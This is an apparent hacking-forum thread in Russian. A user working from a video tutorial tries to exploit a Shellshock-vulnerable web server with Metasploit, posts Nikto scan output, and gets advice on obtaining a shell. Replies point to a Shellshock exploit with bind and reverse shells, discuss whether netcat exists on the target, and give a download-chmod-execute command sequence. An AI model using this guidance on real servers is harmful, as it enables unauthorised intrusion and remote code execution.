Ёбнутый но срочный вопрос

Discussion in 'Уязвимости' started by Sensoft, 17 Feb 2018.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1

    На 2:39 что он делает ?
    У меня win через мету всё точно повторил и вроде как получилось но я линукс не юзаю
    Я так понял он вызвал shell или типа того
    Как это сделать на win ?
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    824
    Likes Received:
    350
    Reputations:
    120
    GoodBoy and Sensoft like this.
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    [​IMG]
    Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?
    тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него
     
  5. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,227
    Likes Received:
    2,607
    Reputations:
    230
    Получается, что нужно запускать сплойт в Command Prompt (Admin).
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    подробнее можно ?
     
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    какой смысл запускать cmd от админа ? это на метосплоит вообще не как не влияет
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    Code:
    + OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
    + OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /restore_config.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2 14-6271).
     
  9. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    84
    Likes Received:
    10
    Reputations:
    0
    возьми шел на питоне
    _https://www.exploit-db.com/exploits/34900/
    Там есть и бинд и реверс..
    Для таких вещей нужно пересаживаться на linux, и куча вопросов отпадет сама по себе.

    А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc
     
    Sensoft likes this.
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    99% что этого нет )
    nc получается обязано быть (
    ну тогда всё тупик
     
  11. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    912
    Likes Received:
    449
    Reputations:
    722
    nc не обязано быть. Тебе дали ответ: используй интерпретаторы для бинда и реверса. На крайний случай можно и скачать что-то: wget http://file, chmod +x /tmp/file, /tmp/file
     
    _________________________
  12. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    84
    Likes Received:
    10
    Reputations:
    0
Loading...